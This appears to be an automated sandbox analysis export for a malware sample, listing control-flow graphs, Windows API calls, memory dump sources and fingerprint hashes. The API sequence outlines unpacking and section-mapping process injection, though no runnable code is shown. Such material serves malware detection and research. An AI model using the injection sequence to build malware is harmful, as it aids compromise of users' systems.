                                                            • Instruction ID: dae095e867f3745097cc185a7748a697303a2d44691d7cc8a0ebaf8866640ae2
                                                            • Opcode Fuzzy Hash: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
                                                            • Instruction Fuzzy Hash: BB415832618E0C8FD768EE6CA8896A377D6E798351B1643BAD808D7384EE30D85183C5

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 484 403257-40325f 485 4031f0-403243 RtlCreateUserThread NtTerminateProcess 484->485 486 403261-40327f 484->486 487 403246-40324b 485->487 492 403281 486->492 493 403286-403290 486->493 492->493 494 403283-403285 492->494 495 403292 493->495 496 403298-4032ba call 4012ec 493->496 494->493 495->496 497 403293-403297 495->497 502 4032be 496->502 502->502
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2385266326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_400000_565.jbxd
                                                            Similarity
                                                            • API ID: CreateProcessTerminateThreadUser
                                                            • String ID:
                                                            • API String ID: 1921587553-0
                                                            • Opcode ID: 8f75c49c67d658a2c62e27a3415f0efa1266b4aad096af7960056c4103048e13
                                                            • Instruction ID: ab58b7d6b66510dde6bc1fc7e766791280fd84229bd7d6ef16cc780df24ac814
                                                            • Opcode Fuzzy Hash: 8f75c49c67d658a2c62e27a3415f0efa1266b4aad096af7960056c4103048e13
                                                            • Instruction Fuzzy Hash: FC1156B181C6448FE714DF78A44A23A7FE4E754326F2407BFD446E12D1D63C8246824B

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 66 2bf003c-2bf0047 67 2bf004c-2bf0263 call 2bf0a3f call 2bf0e0f call 2bf0d90 VirtualAlloc 66->67 68 2bf0049 66->68 83 2bf028b-2bf0292 67->83 84 2bf0265-2bf0289 call 2bf0a69 67->84 68->67 86 2bf02a1-2bf02b0 83->86 88 2bf02ce-2bf03c2 VirtualProtect call 2bf0cce call 2bf0ce7 84->88 86->88 89 2bf02b2-2bf02cc 86->89 95 2bf03d1-2bf03e0 88->95 89->86 96 2bf0439-2bf04b8 VirtualFree 95->96 97 2bf03e2-2bf0437 call 2bf0ce7 95->97 99 2bf04be-2bf04cd 96->99 100 2bf05f4-2bf05fe 96->100 97->95 102 2bf04d3-2bf04dd 99->102 103 2bf077f-2bf0789 100->103 104 2bf0604-2bf060d 100->104 102->100 106 2bf04e3-2bf0505 102->106 107 2bf078b-2bf07a3 103->107 108 2bf07a6-2bf07b0 103->108 104->103 109 2bf0613-2bf0637 104->109 118 2bf0517-2bf0520 106->118 119 2bf0507-2bf0515 106->119 107->108 110 2bf086e-2bf08be LoadLibraryA 108->110 111 2bf07b6-2bf07cb 108->111 112 2bf063e-2bf0648 109->112 117 2bf08c7-2bf08f9 110->117 114 2bf07d2-2bf07d5 111->114 112->103 115 2bf064e-2bf065a 112->115 120 2bf07d7-2bf07e0 114->120 121 2bf0824-2bf0833 114->121 115->103 116 2bf0660-2bf066a 115->116 122 2bf067a-2bf0689 116->122 124 2bf08fb-2bf0901 117->124 125 2bf0902-2bf091d 117->125 126 2bf0526-2bf0547 118->126 119->126 127 2bf07e4-2bf0822 120->127 128 2bf07e2 120->128 123 2bf0839-2bf083c 121->123 129 2bf068f-2bf06b2 122->129 130 2bf0750-2bf077a 122->130 123->110 131 2bf083e-2bf0847 123->131 124->125 132 2bf054d-2bf0550 126->132 127->114 128->121 135 2bf06ef-2bf06fc 129->135 136 2bf06b4-2bf06ed 129->136 130->112 137 2bf084b-2bf086c 131->137 138 2bf0849 131->138 133 2bf0556-2bf056b 132->133 134 2bf05e0-2bf05ef 132->134 140 2bf056f-2bf057a 133->140 141 2bf056d 133->141 134->102 142 2bf06fe-2bf0748 135->142 143 2bf074b 135->143 136->135 137->123 138->110 144 2bf057c-2bf0599 140->144 145 2bf059b-2bf05bb 140->145 141->134 142->143 143->122 150 2bf05bd-2bf05db 144->150 145->150 150->132
                                                            APIs
                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02BF024D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2387106180.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_2bf0000_565.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID: cess$kernel32.dll
                                                            • API String ID: 4275171209-1230238691
                                                            • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                            • Instruction ID: c46072ac14fadc6c14f4da61cc6c098fcb884d1b5859fc903d461aa0a5fc68b9
                                                            • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                            • Instruction Fuzzy Hash: 2B527E74A01229DFDBA4DF58C984BACBBB1BF09304F1484D9E54DA7366DB30AA85CF14

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 465 4154c0-415600 GetModuleHandleW GetProcAddress VirtualProtect
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(02B18CE8), ref: 0041559F
                                                            • GetProcAddress.KERNEL32(00000000,0041ACD0), ref: 004155DC
                                                            • VirtualProtect.KERNELBASE(02B18B2C,02B18CE4,00000040,?), ref: 004155FB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2385310825.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_40b000_565.jbxd
                                                            Similarity
                                                            • API ID: AddressHandleModuleProcProtectVirtual
                                                            • String ID:
                                                            • API String ID: 2099061454-3916222277
                                                            • Opcode ID: 84852efa8c03839483d38d8860323c66b107fbe912840dfdb41af03374aacfca
                                                            • Instruction ID: 391a96fec73ca33ccc7d485fbd88f315141c0e441e0fac2c4929083d5726926d
                                                            • Opcode Fuzzy Hash: 84852efa8c03839483d38d8860323c66b107fbe912840dfdb41af03374aacfca
                                                            • Instruction Fuzzy Hash: 64311C20A5B680CBF301CB78F8047923A62BB25744F44857895498B3A5EBBA5534E7EF

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 503 2c6a76c-2c6a785 504 2c6a787-2c6a789 503->504 505 2c6a790-2c6a79c CreateToolhelp32Snapshot 504->505 506 2c6a78b 504->506 507 2c6a79e-2c6a7a4 505->507 508 2c6a7ac-2c6a7b9 Module32First 505->508 506->505 507->508 515 2c6a7a6-2c6a7aa 507->515 509 2c6a7c2-2c6a7ca 508->509 510 2c6a7bb-2c6a7bc call 2c6a42b 508->510 513 2c6a7c1 510->513 513->509 515->504 515->508
                                                            APIs
                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02C6A794
                                                            • Module32First.KERNEL32(00000000,00000224), ref: 02C6A7B4
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2387276728.0000000002C67000.00000040.00000020.00020000.00000000.sdmp, Offset: 02C67000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_2c67000_565.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateFirstModule32SnapshotToolhelp32
                                                            • String ID:
                                                            • API String ID: 3833638111-0
                                                            • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                            • Instruction ID: fa69604d953707667b37d6a3cc799224cf6dfba9e90aab3ff07ec217afbf80cc
                                                            • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                            • Instruction Fuzzy Hash: EAF06D32600714BBE7203AF9ACCCB7A76F8AF89625F101569E646E14C0DB70E9464A61

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 516 2bf0e0f-2bf0e24 SetErrorMode * 2 517 2bf0e2b-2bf0e2c 516->517 518 2bf0e26 516->518 518->517
                                                            APIs
                                                            • SetErrorMode.KERNELBASE(00000400,?,?,02BF0223,?,?), ref: 02BF0E19
                                                            • SetErrorMode.KERNELBASE(00000000,?,?,02BF0223,?,?), ref: 02BF0E1E
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2387106180.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_2bf0000_565.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorMode
                                                            • String ID:
                                                            • API String ID: 2340568224-0
                                                            • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                            • Instruction ID: 493a6c6bdc8abdcb9cbbc839ae6066722017b708e17f1d27ef97698133936497
                                                            • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                            • Instruction Fuzzy Hash: 64D01231545128B7D7403A94DC09BCD7B1CDF09B66F008451FB0DD9481C770954046E5

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 519 4019c0-4019c6 520 4019e7-401a10 519->520 521 4019c8-4019dd call 40127e 519->521 529 401a13-401a46 call 40127e Sleep call 4014fb 520->529 530 401a09-401a0c 520->530 538 401a55-401a5b 529->538 539 401a48-401a50 call 4015fb 529->539 530->529 542 401a60-401a65 538->542 543 401a69 538->543 539->538 544 401a6c-401a9a call 40127e 542->544 543->542 543->544
                                                            APIs
                                                            • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2385266326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_400000_565.jbxd
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID:
                                                            • API String ID: 3472027048-0
                                                            • Opcode ID: 7f12bac4f1dd78845df68974ec1d6207e79698338a7a17bde6cb34e1bb9e829b
                                                            • Instruction ID: 8602aea7765920f14b43c6808a0d2033de268e003b0f0e4b19403496b7ccbc2b
                                                            • Opcode Fuzzy Hash: 7f12bac4f1dd78845df68974ec1d6207e79698338a7a17bde6cb34e1bb9e829b
                                                            • Instruction Fuzzy Hash: 2B11CE3230A205EADB005AD9A941FBB32199B40754F3041B7B603B90F1953D8913BF2F

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 553 4019e0-401a10 559 401a13-401a46 call 40127e Sleep call 4014fb 553->559 560 401a09-401a0c 553->560 568 401a55-401a5b 559->568 569 401a48-401a50 call 4015fb 559->569 560->559 572 401a60-401a65 568->572 573 401a69 568->573 569->568 574 401a6c-401a9a call 40127e 572->574 573->572 573->574
                                                            APIs
                                                            • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                              • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                              • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2385266326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_400000_565.jbxd
                                                            Similarity
                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                            • String ID:
                                                            • API String ID: 4152845823-0
                                                            • Opcode ID: e17e85e8ed8125533f7e2167abb1cbc7a5f98fbf5ea5e47149eeb4735b4555ca
                                                            • Instruction ID: 6e8e83dbc6cb5325300a6df4c81bf03677ed1736eef4dabc06710691df282c78
                                                            • Opcode Fuzzy Hash: e17e85e8ed8125533f7e2167abb1cbc7a5f98fbf5ea5e47149eeb4735b4555ca
                                                            • Instruction Fuzzy Hash: FA016D3230A209EADB005AD8AD41E7B3229AB40754F3001B7BA03790F1953D99137F2F
                                                            APIs
                                                            • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                              • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                              • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2385266326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_400000_565.jbxd
                                                            Similarity
                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                            • String ID:
                                                            • API String ID: 4152845823-0
                                                            • Opcode ID: d20dd15212e55eeb93c2ba4d893d672a11c9591f500a1070bb8e30cefc0e7994
                                                            • Instruction ID: 2b2adc88e5ab551374836522510027b0c35959e32ac3f93f20a40eb2707c2e9b
                                                            • Opcode Fuzzy Hash: d20dd15212e55eeb93c2ba4d893d672a11c9591f500a1070bb8e30cefc0e7994
                                                            • Instruction Fuzzy Hash: C2014C3230A205EBDB009AD4ED41B6A3269AB44714F3041B7BA13B91F1D53D9A537F2B
                                                            APIs
                                                            • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                              • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                              • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2385266326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_400000_565.jbxd
                                                            Similarity
                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                            • String ID:
                                                            • API String ID: 4152845823-0
                                                            • Opcode ID: 6956420fd1a0da5a043187b5517324543cb26d58a43067072202fc2494389932
                                                            • Instruction ID: 8da435b4ef065fa937355dde1d01ef47451206c1f83fca999a74837282515cb4
                                                            • Opcode Fuzzy Hash: 6956420fd1a0da5a043187b5517324543cb26d58a43067072202fc2494389932
                                                            • Instruction Fuzzy Hash: 8B01363630A209EADB005AD8AD41EBA22559B44314F3042B7BA13B91F5D53D8A137F2F
                                                            APIs
                                                            • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                              • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                              • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2385266326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_400000_565.jbxd
                                                            Similarity
                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                            • String ID:
                                                            • API String ID: 4152845823-0
                                                            • Opcode ID: 470eaab1d85efef32b59b6b80de91dfe5f43d1552a0586931a32e3bd1b407b26
                                                            • Instruction ID: da9cf87a9ed9cba2a5618582a19ce6b128e8deecbf4ee8231104359b1f28a93a
                                                            • Opcode Fuzzy Hash: 470eaab1d85efef32b59b6b80de91dfe5f43d1552a0586931a32e3bd1b407b26
                                                            • Instruction Fuzzy Hash: 4601863230A209EADB005AD49D41FBA22199B44714F3041B7BA13B90F1D53D8A137F2F
                                                            APIs
                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02C6A47C
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2387276728.0000000002C67000.00000040.00000020.00020000.00000000.sdmp, Offset: 02C67000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_2c67000_565.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                            • Instruction ID: ff4bab7f20f058aa9867299383e09e45cc72e0a4cc19227f3bee5901b7cdebc5
                                                            • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                            • Instruction Fuzzy Hash: D8113F79A00208EFDB01DF98C989E98BBF5AF08350F058094F948AB361D375EA50DF90
                                                            APIs
                                                            • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                              • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                              • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2385266326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_400000_565.jbxd
                                                            Similarity
                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                            • String ID:
                                                            • API String ID: 4152845823-0
                                                            • Opcode ID: 47584117f720a46a046c478722b1e9804fa2bdf0c34a1eb8c3916f7c7194f890
                                                            • Instruction ID: ef4a3633df93866afb86b86826f27a476d683f03040323dac8a7d7c578d0eba4
                                                            • Opcode Fuzzy Hash: 47584117f720a46a046c478722b1e9804fa2bdf0c34a1eb8c3916f7c7194f890
                                                            • Instruction Fuzzy Hash: 17F04432309206EBDB01AAD4DD41FAA3229AB44354F3041B7BA13B90F1D53C86127F2B
                                                            APIs
                                                            • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                              • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                              • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2385266326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_400000_565.jbxd
                                                            Similarity
                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                            • String ID:
                                                            • API String ID: 4152845823-0
                                                            • Opcode ID: e9f1e890604c892da627bf4dac1adaaf6327a8231f252b78f611ae96bce34966
                                                            • Instruction ID: 08c596e776171f083f15ab2e9130eea247f108212a51f0ba4fb69116c36cf548
                                                            • Opcode Fuzzy Hash: e9f1e890604c892da627bf4dac1adaaf6327a8231f252b78f611ae96bce34966
                                                            • Instruction Fuzzy Hash: 4BF0FF3230A209EADB005AD59D51EAA26699B44354F3041B7BA13B90F1D53D8A137F2B
                                                            APIs
                                                            • LocalAlloc.KERNELBASE(00000000,02B18CE4,00415B2B), ref: 00415498
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2385310825.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_40b000_565.jbxd
                                                            Similarity
                                                            • API ID: AllocLocal
                                                            • String ID:
                                                            • API String ID: 3494564517-0
                                                            • Opcode ID: 74057e30488fa2548e774f69ad24f16fb778dc8554d8f99b62281b18be0c0aab
                                                            • Instruction ID: 1a08001e757156177e4176ef5c7bf10d863cb70e7c1df62a2ddb33f564a894ee
                                                            • Opcode Fuzzy Hash: 74057e30488fa2548e774f69ad24f16fb778dc8554d8f99b62281b18be0c0aab
                                                            • Instruction Fuzzy Hash: 53B092B09822009BE240CBA0A844B513A68B308342F414421F508C6180DA2054208F14
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2385266326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_400000_565.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 39ba6718c5b4acb6fcb90013f1bab96879de86035533205ab17ba445abaee414
                                                            • Instruction ID: 6725721ff3489d431dd836171e340eb16c8ebd58ca09b28f7b875ac3b9798d56
                                                            • Opcode Fuzzy Hash: 39ba6718c5b4acb6fcb90013f1bab96879de86035533205ab17ba445abaee414
                                                            • Instruction Fuzzy Hash: 43F0273A30669697DB135E7CD0009CCFF10FD6B6207B88BD2D0C09A141C222845BCB90
                                                            APIs
                                                            • BuildCommDCBA.KERNEL32(00000000,?), ref: 004156C1
                                                            • WritePrivateProfileStringA.KERNEL32(00417384,0041735C,00417330,0041730C), ref: 004156E5
                                                            • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 004156ED
                                                            • GetNumaAvailableMemoryNode.KERNEL32(00000000,00000000), ref: 0041572D
                                                            • GetComputerNameW.KERNEL32(?,?), ref: 00415741
                                                            • SetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041574F
                                                            • OpenJobObjectA.KERNEL32(00000000,00000000,004173B4), ref: 0041575E
                                                            • GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 0041576F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2385310825.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_40b000_565.jbxd
                                                            Similarity
                                                            • API ID: Name$AvailableBuildCalendarCommComputerEnvironmentFreeInfoMemoryNodeNumaObjectOpenPathPrivateProfileShortStringStringsWrite
                                                            • String ID: -
                                                            • API String ID: 113859268-2547889144
                                                            • Opcode ID: 180134d01320781e28bb83f214f0822788da48fb39761615eb959522fdd3605f
                                                            • Instruction ID: 7fd8cb6729a01aa94056f6f289b2ac9cdf2ab28260b2dbd3fc15e2ce888fda3c
                                                            • Opcode Fuzzy Hash: 180134d01320781e28bb83f214f0822788da48fb39761615eb959522fdd3605f
                                                            • Instruction Fuzzy Hash: C221F731A44304EBD721DFA4DC86BD97B70FB4C712F5140AAFA4DAA1C0CAB459C4CB59
                                                            APIs
                                                            • QueryDosDeviceW.KERNEL32(00000000,?,00000000), ref: 004157E4
                                                            • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 004157FF
                                                            • HeapDestroy.KERNEL32(00000000), ref: 0041581E
                                                            • GetNumaHighestNodeNumber.KERNEL32(00000000), ref: 00415826
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2385310825.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_40b000_565.jbxd
                                                            Similarity
                                                            • API ID: DestroyDeviceEnvironmentFreeHeapHighestNodeNumaNumberQueryStrings
                                                            • String ID:
                                                            • API String ID: 367530164-0
                                                            • Opcode ID: 7d7ac3b01430fe9ad0e2703191a3d2b1ef9951b1f664e152f897c0a4f0d85179
                                                            • Instruction ID: 68d425cf78a880d44cb9589aafc5291418f972827432eabaf25cd50abb90a3e4
                                                            • Opcode Fuzzy Hash: 7d7ac3b01430fe9ad0e2703191a3d2b1ef9951b1f664e152f897c0a4f0d85179
                                                            • Instruction Fuzzy Hash: 2401F270A82604DBE740FBB4ED89BDA7BA8F70C346F800036E60997280DA345C54CB9A

                                                            Execution Graph

                                                            Execution Coverage:11.1%
                                                            Dynamic/Decrypted Code Coverage:16.5%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:170
                                                            Total number of Limit Nodes:9
                                                            execution_graph 3663 4019c0 3664 4019c8 3663->3664 3665 4019e7 3663->3665 3666 401a29 Sleep 3665->3666 3667 4014fb 7 API calls 3666->3667 3668 401a44 3667->3668 3669 4015fb 7 API calls 3668->3669 3670 401a55 3668->3670 3669->3670 3471 415c40 3474 415840 3471->3474 3473 415c45 3475 41584d 3474->3475 3476 415a30 3475->3476 3477 415907 InterlockedCompareExchange ReadConsoleA FindAtomW SetConsoleMode SearchPathW 3475->3477 3478 415a40 SetCommState 3476->3478 3482 415a59 3476->3482 3479 41596d 7 API calls 3477->3479 3478->3476 3480 415a21 3479->3480 3481 415a1a PulseEvent 3479->3481 3480->3476 3481->3480 3483 415b26 3482->3483 3484 415a66 7 API calls 3482->3484 3495 415490 LocalAlloc 3483->3495 3491 415afa 3484->3491 3488 415b2b LoadLibraryA 3496 4154c0 GetModuleHandleW GetProcAddress VirtualProtect 3488->3496 3489 415b7d 3497 4157b0 3489->3497 3491->3483 3492 415b82 3493 415bb9 InterlockedDecrement 3492->3493 3494 415bcf 3492->3494 3493->3492 3494->3473 3495->3488 3496->3489 3498 4157d9 QueryDosDeviceW 3497->3498 3499 4157ea 3497->3499 3498->3499 3508 415650 3499->3508 3502 415805 3511 415690 3502->3511 3503 4157fd FreeEnvironmentStringsA 3503->3502 3506 41581c HeapDestroy GetNumaHighestNodeNumber 3507 41582c 3506->3507 3507->3492 3509 415661 FatalAppExitA GetModuleHandleW 3508->3509 3510 415673 3508->3510 3509->3510 3510->3502 3510->3503 3512 41569d 3511->3512 3513 4156c9 3512->3513 3514 4156b8 BuildCommDCBA 3512->3514 3515 4156d1 WritePrivateProfileStringA FreeEnvironmentStringsA 3513->3515 3518 4156f3 3513->3518 3514->3518 3515->3518 3516 41577a 3516->3506 3516->3507 3518->3516 3519 415729 GetNumaAvailableMemoryNode GetComputerNameW SetCalendarInfoA OpenJobObjectA GetShortPathNameW 3518->3519 3520 415680 3518->3520 3519->3518 3523 415610 3520->3523 3524 415639 3523->3524 3525 41562c SetEvent 3523->3525 3524->3518 3525->3524 3758 402f42 3760 402f18 3758->3760 3759 4019e0 15 API calls 3761 40304f 3759->3761 3760->3759 3760->3761 3623 403103 3624 403246 3623->3624 3625 40312d 3623->3625 3625->3624 3626 4031f0 RtlCreateUserThread NtTerminateProcess 3625->3626 3626->3624 3762 2e8092b GetPEB 3763 2e80972 3762->3763 3704 401606 3704->3704 3705 401609 3704->3705 3706 4017cb 3705->3706 3707 4016ab NtDuplicateObject 3705->3707 3707->3706 3708 4016cc NtCreateSection 3707->3708 3709 4016f2 NtMapViewOfSection 3708->3709 3710 40174c NtCreateSection 3708->3710 3709->3710 3711 401715 NtMapViewOfSection 3709->3711 3710->3706 3712 401778 3710->3712 3711->3710 3713 401733 3711->3713 3712->3706 3714 401782 NtMapViewOfSection 3712->3714 3713->3710 3714->3706 3715 4017a9 NtMapViewOfSection 3714->3715 3715->3706 3716 401613 3717 40161c 3716->3717 3718 4016ab NtDuplicateObject 3717->3718 3719 4017cb 3717->3719 3718->3719 3720 4016cc NtCreateSection 3718->3720 3721 4016f2 NtMapViewOfSection 3720->3721 3722 40174c NtCreateSection 3720->3722 3721->3722 3723 401715 NtMapViewOfSection 3721->3723 3722->3719 3724 401778 3722->3724 3723->3722 3725 401733 3723->3725 3724->3719 3726 401782 NtMapViewOfSection 3724->3726 3725->3722 3726->3719 3727 4017a9 NtMapViewOfSection 3726->3727 3727->3719 3526 2e8003c 3527 2e80049 3526->3527 3539 2e80e0f SetErrorMode SetErrorMode 3527->3539 3532 2e80265 3533 2e802ce VirtualProtect 3532->3533 3535 2e8030b 3533->3535 3534 2e80439 VirtualFree 3538 2e804be LoadLibraryA 3534->3538 3535->3534 3537 2e808c7 3538->3537 3540 2e80223 3539->3540 3541 2e80d90 3540->3541 3542 2e80dad 3541->3542 3543 2e80dbb GetPEB 3542->3543 3544 2e80238 VirtualAlloc 3542->3544 3543->3544 3544->3532 3545 403257 3546 4031f0 RtlCreateUserThread NtTerminateProcess 3545->3546 3547 403261 3545->3547 3548 403246 3546->3548 3754 402ed9 3755 402e8d 3754->3755 3755->3754 3756 4019e0 15 API calls 3755->3756 3757 40304f 3755->3757 3756->3757 3584 2c39d9c 3585 2c39dab 3584->3585 3588 2c3a53c 3585->3588 3589 2c3a557 3588->3589 3590 2c3a560 CreateToolhelp32Snapshot 3589->3590 3591 2c3a57c Module32First 3589->3591 3590->3589 3590->3591 3592 2c39db4 3591->3592 3593 2c3a58b 3591->3593 3595 2c3a1fb 3593->3595 3596 2c3a226 3595->3596 3597 2c3a26f 3596->3597 3598 2c3a237 VirtualAlloc 3596->3598 3597->3597 3598->3597 3671 4019eb 3672 4019f0 3671->3672 3673 401a29 Sleep 3672->3673 3674 4014fb 7 API calls 3673->3674 3675 401a44 3674->3675 3676 4015fb 7 API calls 3675->3676 3677 401a55 3675->3677 3676->3677 3599 4014fa 3600 40150c 3599->3600 3601 4016ab NtDuplicateObject 3600->3601 3610 4015ea 3600->3610 3602 4016cc NtCreateSection 3601->3602 3601->3610 3603 4016f2 NtMapViewOfSection 3602->3603 3604 40174c NtCreateSection 3602->3604 3603->3604 3605 401715 NtMapViewOfSection 3603->3605 3606 401778 3604->3606 3604->3610 3605->3604 3607 401733 3605->3607 3608 401782 NtMapViewOfSection 3606->3608 3606->3610 3607->3604 3609 4017a9 